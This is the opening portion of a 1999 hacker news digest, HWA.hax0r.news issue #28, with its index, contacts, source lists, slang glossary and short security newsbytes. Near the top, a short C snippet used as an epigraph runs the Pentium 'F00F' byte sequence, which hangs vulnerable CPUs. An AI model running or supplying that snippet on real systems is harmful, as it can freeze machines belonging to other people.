[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                       <=-[ HWA.hax0r.news ]-=>                         =
==========================================================================
  [=HWA'99=]                         Number 28 Volume 1 1999 Aug 7th 99
==========================================================================
                    [ 61:20:6B:69:64:20:63:6F:75: ]
               [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
               [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

  Like all religions, the Holy Religion of the Invisible Pink Unicorn
  is based upon both Logic and Faith. We have Faith that She is Pink;
  and we Logically know that She is Invisible, because we can't see Her.

        - http://www.ozemail.com.au/~ksolway/athquot.html

  */
  char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };
  main ()
  {
  void (*f)() = x;
  f();
  }

  New mirror site: http://www.ducktank.net/hwa/issues.html.

  HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
  and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
  and airportman for the Cubesoft bandwidth. Also shouts out to all our
  mirror sites! tnx guys.

    http://www.csoft.net/~hwa
    http://www.digitalgeeks.com/hwa

  HWA.hax0r.news Mirror Sites:
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    http://www.ducktank.net/hwa/issues.html. ** NEW **
    http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
    http://www.csoft.net/~hwa/
    http://www.digitalgeeks.com/hwa.
    http://members.tripod.com/~hwa_2k
    http://welcome.to/HWA.hax0r.news/
    http://www.attrition.org/~modify/texts/zines/HWA/
    http://archives.projectgamma.com/zines/hwa/.
    http://www.403-security.org/Htmls/hwa.hax0r.news.htm

  For many, faith is a suitable substitute for knowledge, as death is
  for a difficult life.
  SYNOPSIS (READ THIS)
  --------------------

  The purpose of this newsletter is to 'digest' current events of interest
  that affect the online underground and netizens in general. This includes
  coverage of general security issues, hacks, exploits, underground news
  and anything else I think is worthy of a look see. (remember i'm doing
  this for me, not you, the fact some people happen to get a kick/use
  out of it is of secondary importance).

  This list is NOT meant as a replacement for, nor to compete with, the
  likes of publications such as CuD or PHRACK or with news sites such as
  AntiOnline, the Hacker News Network (HNN) or mailing lists such as
  BUGTRAQ or ISN nor could any other 'digest' of this type do so.

  It *is* intended however, to complement such material and provide a
  reference to those who follow the culture by keeping tabs on as many
  sources as possible and providing links to further info, it's a labour
  of love and will be continued for as long as I feel like it, i'm not
  motivated by dollars or the illusion of fame, did you ever notice how
  the most famous/infamous hackers are the ones that get caught? there's
  a lot to be said for remaining just outside the circle...

  @HWA

=-----------------------------------------------------------------------=

                  Welcome to HWA.hax0r.news ... #28

=-----------------------------------------------------------------------=

  We could use some more people joining the channel, it's usually pretty
  quiet, we don't bite (usually) so if you're hanging out on irc stop by
  and idle a while and say hi...

  *******************************************************************
  ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
  ***                                                             ***
  *** please join to discuss or impart news on techno/phac scene  ***
  *** stuff or just to hang out ... someone is usually around 24/7***
  ***                                                             ***
  *** Note that the channel isn't there to entertain you its for  ***
  *** you to talk to us and impart news, if you're looking for fun***
  *** then do NOT join our channel try #weirdwigs or something... ***
  *** we're not #chatzone or #hack                                ***
  ***                                                             ***
  *******************************************************************

=-------------------------------------------------------------------------=

  Issue #28

=--------------------------------------------------------------------------=

  [ INDEX ]

=--------------------------------------------------------------------------=
  Key     Intros
=--------------------------------------------------------------------------=

  00.0 .. COPYRIGHTS
  00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
  00.2 .. SOURCES
  00.3 .. THIS IS WHO WE ARE
  00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?
  00.5 .. THE HWA_FAQ V1.0

=--------------------------------------------------------------------------=
  Key     Content
=--------------------------------------------------------------------------=

  01.0 .. GREETS
  01.1 .. Last minute stuff, rumours, newsbytes
  01.2 .. Mailbag
  02.0 .. From the Editor
  03.0 .. Debunking the debunked by route
  04.0 .. DefCon 7 by AgentX
  05.0 .. Hacking Faq by ben-z 5/14/99
  06.0 .. Group approves controversial software law
  07.0 .. Falun Gong Web Sites Attacked by China?
  08.0 .. Super Computer Almost Gets Away
  09.0 .. Symantec's website hacked
  10.0 .. New virus due to hit town "New virus spills your beans " - BBC
  11.0 .. New York Times Debunked - FIDNet Moves Ahead as Planned
  12.0 .. Computer `crackers' set sights on .gov for chaos
  13.0 .. IIS Server 'hackproof'?
  14.0 .. Latest CWD Pokes at AntiOnline
  15.0 .. High Profile Sites Defaced
  16.0 .. Off The Hook Goes Shortwave
  17.0 .. Feds Stop Satellite Biz due to WireTaps
  18.0 .. InfoCriminals Should Face Reasonable Penalties
  19.0 .. L0pht Professional Plugin Pack For BO2K
  20.0 .. MS Wants Free Publicity?
  20.1 .. MS: a crashed site is hard to hack!
  21.0 .. China Seeks to Develop Infowar Capabilities
  22.0 .. Online Banking Still Risky Congress Says
  23.0 .. NIPRNet Access Restricted
  24.0 .. Gov Employees Personal Privacy at Risk
  25.0 .. Other Security Challenges Offered
  25.1 .. Software developer offers hacker challenge
  26.0 .. CCC Camp About to Get Under Way
  27.0 .. Hackers... Those Who Would Be Gods
  28.0 .. European Crypto Mailing List
  29.0 .. "Ya Wanna Be Hackers, Code Crackers, or just AOL Chat Room Yackers?"
  30.0 .. WHO DO YOU WANT TO BE TODAY?
  31.0 .. NAI GROUPSHIELD FOR EXCHANGE BUG
  32.0 .. How the blackhats work
  33.0 .. ADMINS ASLEEP ON WATCH?
  34.0 .. THEFT HURTS THE WELL
  35.0 .. MICROSOFT SECURITY FLAWS
  36.0 .. CHINESE CYBER WARRIORS
  37.0 .. MICROSOFT AND SECURITY (AGAIN)
  38.0 .. THE ENEMY WITHIN
  39.0 .. DRUNKEN HACKERS ON JERRY SPRINGER
  40.0 .. DATA PROTECTION NOT TO BE IGNORED
  41.0 .. WIRELESS ENCRYPTION HANDHELDS
  42.0 .. Y2K TO AID IN CYBERDEFENSE
  43.0 .. BUGTRAQ:Yet Another ODBC Bugged ASP Sample Page
  44.0 .. New mailing lists offered by www.securityfocus.com
  45.0 .. Beyond Virtual Vaccinations
  46.0 .. Forgot your password? Try 'way2many'
  47.0 .. A Former Network Administrator Faces Felony Charges in Hacker-Site Case
  48.0 .. Kevin's life now, and happy birthday Kevin
  49.0 .. Cybercrime up 43%
  50.0 .. Canada Can't Keep Up With CyberCrime
  51.0 .. Germans hold bank liable for using 56 bit encryption
  52.0 .. GPS Date Rollover on Aug 22
  53.0 .. NY Police Face Possible Copyright Violations
  54.0 .. Chaos Computer Club: Happy Hacker Campers
  55.0 .. Hackers and Cyberwar "The Threat of Chaos "
  56.0 .. Lockdown 2000
  57.0 .. The SMURF attack and smurf amplifiers

=--------------------------------------------------------------------------=

  AD.S   .. Post your site ads or etc here, if you can offer something in
            return thats tres cool, if not we'll consider ur ad anyways so
            send it in. ads for other zines are ok too btw just mention us
            in yours, please remember to include links and an email
            contact. Corporate ads will be considered also and if your
            company wishes to donate to or participate in the upcoming
            Canc0n99 event send in your suggestions and ads now...n.b date
            and time may be pushed back join mailing list for up to date
            information.
            Current dates: Aug19th-22nd Niagara Falls...

  Ha.Ha  .. Humour and puzzles

            Hey You!
            =------=
            Send in humour for this section! I need a laugh and its hard
            to find good stuff... ;)

  SITE.1 .. Featured site,
  H.W    .. Hacked Websites
  A.0    .. APPENDICES
  A.1    .. PHACVW linx and references

=--------------------------------------------------------------------------=

  @HWA'99

00.0  (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF
  THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE
  RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
  IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS
  (SEE FAQ).

  Important semi-legalese and license to redistribute:

  YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE
  GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS
  Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING.
  LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current
  link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO
  VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU
  FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email
  cruciphux@dok.org

  THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS
  ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT
  AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

  I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
  REDISTRIBUTE/MIRROR. - EoD

  Although this file and all future issues are now copyright, some of
  the content holds its own copyright and these are printed and
  respected. News is news so i'll print any and all news but will quote
  sources when the source is known, if its good enough for CNN its good
  enough for me. And i'm doing it for free on my own time so pfffft. :)

  No monies are made or sought through the distribution of this material.
  If you have a problem or concern email me and we'll discuss it.

  cruciphux@dok.org

  Cruciphux [C*:.]

00.1  CONTACT INFORMATION AND MAIL DROP
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
  Canada / North America (hell even if you are inside ..) and wish to
  send printed matter like newspaper clippings a subscription to your
  cool foreign hacking zine or photos, small non-explosive packages
  or sensitive information etc etc well, now you can. (w00t) please
  no more inflatable sheep or plastic dog droppings, or fake vomit
  thanks.

  Send all goodies to:

      HWA NEWS
      P.O BOX 44118
      370 MAIN ST. NORTH
      BRAMPTON, ONTARIO
      CANADA
      L6V 4H5

  WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
  ~~~~~~~  reading this from some interesting places, make my day and get a
           mention in the zine, send in a postcard, I realize that some
           places it is cost prohibitive but if you have the time and money
           be a cool dude / gal and send a poor guy a postcard preferably
           one that has some scenery from your place of residence for my
           collection, I collect stamps too so you kill two birds with one
           stone by being cool and mailing in a postcard, return address not
           necessary, just a "hey guys being cool in Bahrain, take it easy"
           will do ... ;-) thanx.

  Ideas for interesting 'stuff' to send in apart from news:

  - Photo copies of old system manual front pages (optionally signed by
    you) ;-)
  - Photos of yourself, your mom, sister, dog and or cat in a NON
    compromising position plz I don't want pr0n.
  - Picture postcards
  - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
    tapes with hack/security related archives, logs, irc logs etc on em.
  - audio or video cassettes of yourself/others etc of interesting phone
    fun or social engineering examples or transcripts thereof.
  Stuff you can email:

  - Prank phone calls in .ram or .mp* format
  - Fone tones and security announcements from PBX's etc
  - fun shit you sampled off yer scanner (relevant stuff only like #2600
    meeting activities)
  - reserved for one smiley face -> :-) <-
  - PHACV lists of files that you have or phac cd's you own (we have a
    burner, *g*)
  - burns of phac cds (email first to make sure we don't already have em)
  - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc
    in .ram etc format or .mp*

  If you still can't think of anything you're probably not that
  interesting a person after all so don't worry about it

  Our current email:

  Submissions/zine gossip.....: hwa@press.usmc.net
  Private email to editor.....: cruciphux@dok.org
  Distribution/Website........: sas72@usa.net

  @HWA

00.2  Sources ***
      ~~~~~~~~~~~

  Sources can be some, all, or none of the following (by no means
  complete nor listed in any degree of importance) Unless otherwise
  noted, like msgs from lists or news from other sites, articles and
  information is compiled and or sourced by Cruciphux no copyright
  claimed.

  News & I/O zine ................. http://www.antionline.com/
  Back Orifice/cDc..................http://www.cultdeadcow.com/
  News site (HNN) .....,............http://www.hackernews.com/
  Help Net Security.................http://net-security.org/
  News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
  NewsTrolls .(daily news ).........http://www.newstrolls.com/
  News + Exploit archive ...........http://www.rootshell.com/beta/news.html
  CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
  News site+........................http://www.zdnet.com/
  News site+Security................http://www.gammaforce.org/
  News site+Security................http://www.projectgamma.com/
  News site+Security................http://securityhole.8m.com/
  News site+Security related site...http://www.403-security.org/ *DOWN*
  News/Humour site+ ................http://www.innerpulse.com
  News/Techie news site.............http://www.slashdot.org

  +Various mailing lists and some newsgroups, such as ...
  +other sites available on the HNN affiliates page, please see
   http://www.hackernews.com/affiliates.html as they seem to be popping
   up rather frequently ...

  http://www.the-project.org/ .. IRC list/admin archives
  http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

  alt.hackers.malicious
  alt.hackers
  alt.2600
  BUGTRAQ
  ISN security mailing list
  ntbugtraq
  <+others>

  NEWS Agencies, News search engines etc:
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  http://www.cnn.com/SEARCH/
  http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
  http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
  http://www.ottawacitizen.com/business/
  http://search.yahoo.com.sg/search/news_sg?p=hack
  http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
  http://www.zdnet.com/zdtv/cybercrime/
  http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

  NOTE: See appendices for details on other links.
  http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
  http://freespeech.org/eua/ Electronic Underground Affiliation
  http://ech0.cjb.net ech0 Security
  http://axon.jccc.net/hir/ Hackers Information Report
  http://net-security.org Net Security
  http://www.403-security.org Daily news and security related site

  Submissions/Hints/Tips/Etc
  ~~~~~~~~~~~~~~~~~~~~~~~~~~

  All submissions that are `published' are printed with the credits
  you provide, if no response is received by a week or two it is assumed
  that you don't care whether the article/email is to be used in an issue
  or not and may be used at my discretion.

  Looking for:

  Good news sites that are not already listed here OR on the HNN
  affiliates page at http://www.hackernews.com/affiliates.html

  Magazines (complete or just the articles) of breaking sekurity or
  hacker activity in your region, this includes telephone phraud and any
  other technological use, abuse hole or cool thingy. ;-) cut em out and
  send it to the drop box.

  - Ed

  Mailing List Subscription Info   (Far from complete)         Feb 1999
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

  ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

  THE MOST READ:

  BUGTRAQ - Subscription info
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~

  What is Bugtraq?

  Bugtraq is a full-disclosure UNIX security mailing list, (see the info
  file) started by Scott Chasin. To subscribe to bugtraq, send mail to
  listserv@netspace.org containing the message body subscribe bugtraq.
  I've been archiving this list on the web since late 1993. It is
  searchable with glimpse and archived on-the-fly with hypermail.

  Searchable Hypermail Index;

      http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

  About the Bugtraq mailing list
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  The following comes from Bugtraq's info file:

  This list is for *detailed* discussion of UNIX security holes: what
  they are, how to exploit, and what to do to fix them.
  This list is not intended to be about cracking systems or exploiting
  their vulnerabilities. It is about defining, recognizing, and
  preventing use of security holes and risks.

  Please refrain from posting one-line messages or messages that do not
  contain any substance that can relate to this list's charter. I will
  allow certain informational posts regarding updates to security tools,
  documents, etc. But I will not tolerate any unnecessary or nonessential
  "noise" on this list.

  Please follow the below guidelines on what kind of information should
  be posted to the Bugtraq list:

  + Information on Unix related security holes/backdoors (past and present)
  + Exploit programs, scripts or detailed processes about the above
  + Patches, workarounds, fixes
  + Announcements, advisories or warnings
  + Ideas, future plans or current works dealing with Unix security
  + Information material regarding vendor contacts and procedures
  + Individual experiences in dealing with above vendors or security
    organizations
  + Incident advisories or informational reporting

  Any non-essential replies should not be directed to the list but to
  the originator of the message. Please do not "CC" the bugtraq reflector
  address if the response does not meet the above criteria.

  Remember: YOYOW.

  You own your own words. This means that you are responsible for the
  words that you post on this list and that reproduction of those words
  without your permission in any medium outside the distribution of this
  list may be challenged by you, the author.

  For questions or comments, please mail me:
  chasin@crimelab.com (Scott Chasin)

  Crypto-Gram
  ~~~~~~~~~~~

  CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
  insights, and commentaries on cryptography and computer security.

  To subscribe, visit http://www.counterpane.com/crypto-gram.html or send
  a blank message to crypto-gram-subscribe@chaparraltree.com. To
  unsubscribe, visit http://www.counterpane.com/unsubform.html.
  Back issues are available on http://www.counterpane.com.

  CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
  Counterpane Systems, the author of "Applied Cryptography," and an
  inventor of the Blowfish, Twofish, and Yarrow algorithms. He served
  on the board of the International Association for Cryptologic
  Research, EPIC, and VTW. He is a frequent writer and lecturer on
  cryptography.

  CUD Computer Underground Digest
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  This info directly from their latest ish:

  Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                                 ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

  [ISN] Security list
  ~~~~~~~~~~~~~~~~~~~

  This is a low volume list with lots of informative articles, if I had
  my way i'd reproduce them ALL here, well almost all .... ;-) - Ed

  Subscribe: mail majordomo@repsec.com with "subscribe isn".

  @HWA

00.3  THIS IS WHO WE ARE
      ~~~~~~~~~~~~~~~~~~

  Some HWA members and Legacy staff
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  cruciphux@dok.org.........: currently active/editorial
  darkshadez@ThePentagon.com: currently active/man in black
  fprophet@dok.org..........: currently active/IRC+ man in black
  sas72@usa.net ............. currently active/IRC+ distribution
  vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
  dicentra...(email withheld): IRC+ grrl in black
  eentity ...( '' '' ): Currently active/IRC+ man in black

  Foreign Correspondents/affiliate members
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  Qubik ............................: United Kingdom
  D----Y ...........................: USA/world media
  HWA members ......................: World Media

  Past Foreign Correspondents (currently inactive or presumed dead)
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  N0Portz ..........................: Australia
  system error .....................: Indonesia
  Wile (wile coyote) ...............: Japan/the East
  Ruffneck ........................: Netherlands/Holland

  Please send in your sites for inclusion here if you haven't already
  also if you want your emails listed send me a note ... - Ed

  Spikeman's site is down as of this writing, if it comes back online it
  will be posted here.

  http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

  :-p

  1. We do NOT work for the government in any shape or form. Unless you
     count paying taxes ... in which case we work for the gov't in a BIG
     WAY. :-/

  2. MOSTLY Unchanged since issue #1, although issues are a digest of
     recent news events its a good idea to check out issue #1 at least
     and possibly also the Xmas issue for a good feel of what we're all
     about otherwise enjoy - Ed ...

  @HWA

00.4  Whats in a name? why HWA.hax0r.news??
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Well what does HWA stand for? never mind if you ever find out I may
  have to get those hax0rs from 'Hackers' or the Pretorians after you.
  In case you couldn't figure it out hax0r is "new skewl" and although
  it is laughed at, shunned, or even pigeon holed with those 'dumb leet
  (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's
  HACKERS anymore. BTW to all you up and comers, i'd highly recommend you
  get that book. Its almost like buying a clue. Anyway..on with the show ..

  - Editorial staff

  @HWA

00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Also released in issue #3. (revised) check that issue for the faq
  it won't be reprinted unless changed in a big way with the exception
  of the following excerpt from the FAQ, included to assist first time
  readers:

  Some of the stuff related to personal usage and use in this zine are
  listed below: Some are very useful, others attempt to deny any possible
  attempts at eschewing obfuscation by obscuring their actual definitions.

  @HWA   - see EoA ;-)

  !=     - Mathematical notation "is not equal to" or "does not equal"
           ASC(247) "wavey equals" sign means "almost equal" to. If written
           an =/= (equals sign with a slash thru it) also means !=, =< is
           Equal to or less than and => is equal to or greater than (etc,
           this aint fucking grade school, cripes, don't believe I just
           typed all that..)

  AAM    - Ask a minor (someone under age of adulthood, usually <16, <18
           or <21)

  AOL    - A great deal of people that got ripped off for net access by a
           huge clueless isp with sekurity that you can drive buses
           through, we're not talking Kung-Fu being none too good here,
           Buy-A-Kloo maybe at the least they could try leasing one??

  *CC    - 1 - Credit Card (as in phraud)
           2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

  CCC    - Chaos Computer Club (Germany)

  *CON   - Conference, a place hackers crackers and hax0rs among others go
           to swap ideas, get drunk, swap new mad inphoz, get drunk, swap
           gear, get drunk watch videos and seminars, get drunk, listen to
           speakers, and last but not least, get drunk.
  *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular
             hacker speak he's the guy that breaks into systems and is
             often (but by no means always) a "script kiddie" see pheer
             2 . An edible biscuit usually crappy tasting without a nice
             dip, I like jalapeno pepper dip or chives sour cream and
             onion, yum - Ed

  Ebonics - speaking like a rastafarian or hip dude of colour also wigger
            Vanilla Ice is a wigger, The Beastie Boys and rappers speak
            using ebonics, speaking in a dark tongue ... being ereet, see
            pheer

  EoC    - End of Commentary

  EoA    - End of Article or more commonly @HWA

  EoF    - End of file

  EoD    - End of diatribe (AOL'ers: look it up)

  FUD    - Coined by Unknown and made famous by HNN - "Fear uncertainty
           and doubt", usually in general media articles not high brow
           articles such as ours or other HNN affiliates ;)

  du0d   - a small furry animal that scurries over keyboards causing
           people to type weird crap on irc, hence when someone says
           something stupid or off topic 'du0d wtf are you talkin about'
           may be used.

  *HACKER - Read Stephen Levy's HACKERS for the true definition, then see
            HAX0R

  *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this
           is difficult to define, I think it is best defined as pop
           culture's view on The Hacker ala movies such as well erhm
           "Hackers" and The Net etc... usually used by "real" hackers or
           crackers in a derogatory or slang humorous way, like 'hax0r me
           some coffee?' or can you hax0r some bread on the way to the
           table please?'
           2 - A tool for cutting sheet metal.

  HHN    - Maybe a bit confusing with HNN but we did spring to life around
           the same time too, HWA Hax0r News.... HHN is a part of HNN ..
           and HNN as a proper noun means the hackernews site proper.
           k? k. ;&

  HNN    - Hacker News Network and its affiliates
           http://www.hackernews.com/affiliates.html

  J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

  MFI/MOI- Missing on/from IRC

  NFC    - Depends on context: No Further Comment or No Fucking Comment

  NFR    - Network Flight Recorder (Do a websearch) see 0wn3d

  NFW    - No fuckin'way

  *0WN3D - You are cracked and owned by an elite entity see pheer

  *OFCS  - Oh for christ's sakes

  PHACV  - And variations of same
           Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups
           Virus, Warfare

           Alternates: H - hacking, hacktivist
                       C - Cracking
                       C - Cracking
                       V - Virus
                       W - Warfare
                       A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                       P - Phreaking, "telephone hacking" PHone fREAKs ...
                      CT - Cyber Terrorism

  *PHEER - This is what you do when an ereet or elite person is in your
           presence see 0wn3d

  *RTFM  - Read the fucking manual - not always applicable since some
           manuals are pure shit but if the answer you seek is indeed in
           the manual then you should have RTFM you dumb ass.

  TBC    - To Be Continued also 2bc (usually followed by ellipses...) :^0

  TBA    - To Be Arranged/To Be Announced also 2ba

  TFS    - Tough fucking shit.

  *w00t  - 1 - Reserved for the uber ereet, noone can say this without
           severe repercussions from the underground masses. also "w00ten"
           2 - Cruciphux and sAs72's second favourite word (they're both
           shit stirrers)

  *wtf   - what the fuck, where the fuck, when the fuck etc ..

  *ZEN   - The state you reach when you *think* you know everything (but
           really don't) usually shortly after reaching the ZEN like state
           something will break that you just 'fixed' or tweaked.

  @HWA

                        -=-     :.     .:     -=-

01.0  Greets!?!?! yeah greets! w0w huh. - Ed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Thanks to all in the community for their support and interest but i'd
  like to see more reader input, help me out here, whats good, what sucks
  etc, not that I guarantee i'll take any notice mind you, but send in
  your thoughts anyway.
  * all the people who sent in cool emails and support

  FProphet    Pyra        TwstdPair   _NeM_
  D----Y      Dicentra    vexxation   sAs72
  Spikeman    p0lix

  Ken Williams/tattooman of PacketStorm, hang in there Ken...:(

  & Kevin Mitnick (Happy Birthday)

  kewl sites:

  + http://www.securityportal.com/ NEW
  + http://www.securityfocus.com/ NEW
  + http://www.hackcanada.com/
  + http://www.l0pht.com/
  + http://www.2600.com/
  + http://www.freekevin.com/
  + http://www.genocide2600.com/
  + http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ******
  + http://www.hackernews.com/ (Went online same time we started issue 1!)
  + http://www.net-security.org/
  + http://www.slashdot.org/
  + http://www.freshmeat.net/
  + http://www.403-security.org/
  + http://ech0.cjb.net/

  @HWA

01.1  Last minute stuff, rumours and newsbytes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  "What is popular isn't always right, and what is right isn't always
   popular..." - FProphet '99

  +++ When was the last time you backed up your important data?

  ++ SOPHOS WITH OXFAM
     From www.net-security.org/
     by BHZ, Thursday 5th August 1999 on 1:58 pm CET

     Oxfam (www.oxfam.org), Britain's largest overseas aid charity, which
     employs over 250000 people, evaluated all anti-virus products on the
     market and chose Sophos (www.sophos.com) for securing their WANs,
     servers, workstations and laptops of viruses.

  ++ MICROSOFT STILL WORKING
     From www.net-security.org/
     by BHZ, Thursday 5th August 1999 on 1:49 pm CET

     Microsoft is still trying to patch a bug in Office97, that we
     reported about earlier. Microsoft's group product manager for Office
     said: "Right now we are thoroughly testing the solution, We take all
     security issues seriously. To date, we have not heard from any
     customers on the issue".

  ++ Y2K IN SCHOOL SYSTEMS
     From www.net-security.org/
     by BHZ, Thursday 5th August 1999 on 1:25 pm CET

     New draft about Y2K problem in schools and universities, says some
     very disturbing news - less than one third of all school institutions
     reported that they are Y2K compliant.
Draft concludes that: "a troubling number of institutions, especially in the elementary/secondary area, have not yet completed their assessment of systems and are lagging in remediation and testing."

++ JAPAN WILL HALT TRAINS
From www.net-security.org/
by BHZ, Thursday 5th August 1999 on 1:53 pm CET

Spokesman from East Japan Railway Co., Japan's largest rail company said that they will halt all trains on the last day of this millennium. It will last just for couple of minutes - last minutes of 1999 and several minutes in the year 2000. This will all be done as a precaution against possible Y2K errors.

++ OUTDOOR GEEKS MAY VANISH SOON (TECH. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/21098.html

Weekend warriors take to the oceans, forests, rivers, and skies this month, and they'll get back home with the help of GPS. Unless the gear crashes. By James Glave.

++ DROP OUT AND CASH IN (BUS. 9:00 am)
http://www.wired.com/news/news/email/explode-infobeat/business/story/21116.html

Score one more for the geeks who drop out of school. A 21-year-old from Dallas sells his hardware review Web site to EarthWeb for millions. By Chris Gaither.

++ Y2K CZAR: FEDS IN GOOD SHAPE (BUS. 9:00 am)
http://www.wired.com/news/news/email/explode-infobeat/business/story/21114.html

In his quarterly report, John Koskinen says things look good at a national level, but some local systems are iffy. Also: Warner Bros. pushes Iron Giant on the Web.... AOL, BigE in Latin American deal.... Everyone wants a robodog.... And more.

++ A NUTS-AND-BOLTS HOUSEKEEPER (TECH. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/21060.html

To hell with your Hoover. A new domestic robot will vacuum your floor and carry the dishes for you. But your new housemate is a long way from having a personality. By Lindsey Arent.

++ COURT HAS A NASTY WORD FOR MS (POL. Wednesday)
http://www.wired.com/news/news/email/explode-infobeat/politics/story/21096.html

As if Microsoft weren't having enough trouble with the courts these days, jurists are upset because Word 97 is doing a lousy job word-counting legal briefs. By Declan McCullagh.

++ A PALM IN THE TOOL BELT (TECH. Wednesday)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/21094.html

Construction workers are using PalmPilots onsite to download blueprints and help plan for the weather. Staying connected is yielding concrete results. By Lindsey Arent.

++ MICROWORKZ SIGNS ON AT&T (TECH. Wednesday)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/21091.html

Dumped by Earthlink just days ago, the PC provider smoothes its feathers and turns to AT&T to provide iToaster customers with free Net access.

++ RIAA, DIAMOND SWEEP AWAY SUIT (POL. Wednesday)
http://www.wired.com/news/news/email/explode-infobeat/politics/story/21089.html

The recording industry makes peace with the MP3 maker, but questions over a new standard raises a new question: Will it last? By Chris Oakes.

Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

02.0 From the editor.
~~~~~~~~~~~~~~~~

